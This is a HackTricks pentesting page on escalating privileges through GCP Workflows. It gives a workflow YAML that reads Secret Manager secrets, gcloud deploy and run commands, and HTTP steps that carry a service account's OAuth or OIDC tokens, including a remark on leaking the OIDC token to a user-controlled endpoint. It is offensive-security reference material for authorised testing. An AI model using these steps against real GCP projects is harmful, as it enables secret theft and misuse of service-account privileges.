{{#include ../../../banners/hacktricks-training.md}}
Basic Information:
{{#ref}} ../gcp-services/gcp-workflows-enum.md {{#endref}}
workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)
Afaik it's not possible to get a shell with access to the metadata endpoint containing the SA credentials of the SA attacked to a Workflow. However, it's possible to abuse the permissions of the SA by adding the actions to perform inside the Workflow.
It's possible to find the documentation of the connectors. For example, this is the page of the Secretmanager connector. In the side bar it's possible to find several other connectors.
And here you can find an example of a connector that prints a secret:
Workflow YAML configuration to access secrets
main:
params: [input]
steps:
- access_string_secret:
call: googleapis.secretmanager.v1.projects.secrets.versions.accessString
args:
secret_id: secret_name
version: 1
project_id: project-id
result: str_secret
- returnOutput:
return: "${str_secret}"Update from the CLI:
Deploy and execute workflows from CLI
gcloud workflows deploy <workflow-name> \
--service-account=email@SA \
--source=/path/to/config.yaml \
--location us-central1If you get an error like ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist, just wait a minute and try again.
If you don't have web access it's possible to trigger and see the execution of a Workflow with:
# Run execution with output
gcloud workflows run <workflow-name> --location us-central1
# Run execution without output
gcloud workflows execute <workflow-name> --location us-central1
# List executions
gcloud workflows executions list <workflow-name>
# Get execution info and output
gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>Caution
You can also check the output of previous executions to look for sensitive information
Note that even if you get an error like PERMISSION_DENIED: Permission 'workflows.operations.get' denied on... because you don't have that permission, the workflow has been generated.
According to the docs it's possible to use workflow steps that will send an HTTP request with the OAuth or OIDC token. However, just like in the case of Cloud Scheduler, the HTTP request with the Oauth token must be to the host .googleapis.com.
Caution
Therefore, it's possible to leak the OIDC token by indicating a HTTP endpoint controlled by the user but to leak the OAuth token you would need a bypass for that protection. However, you are still able to contact any GCP api to perform actions on behalf the SA using either connectors or HTTP requests with the OAuth token.
Workflow HTTP request with OAuth token
- step_A:
call: http.post
args:
url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop
auth:
type: OAuth2
scopes: OAUTH_SCOPEWorkflow HTTP request with OIDC token
- step_A:
call: http.get
args:
url: https://us-central1-project.cloudfunctions.net/functionA
query:
firstNumber: 4
secondNumber: 6
operation: sum
auth:
type: OIDC
audience: OIDC_AUDIENCEWith this permission instead of workflows.workflows.create it's possible to update an already existing workflow and perform the same attacks.
{{#include ../../../banners/hacktricks-training.md}}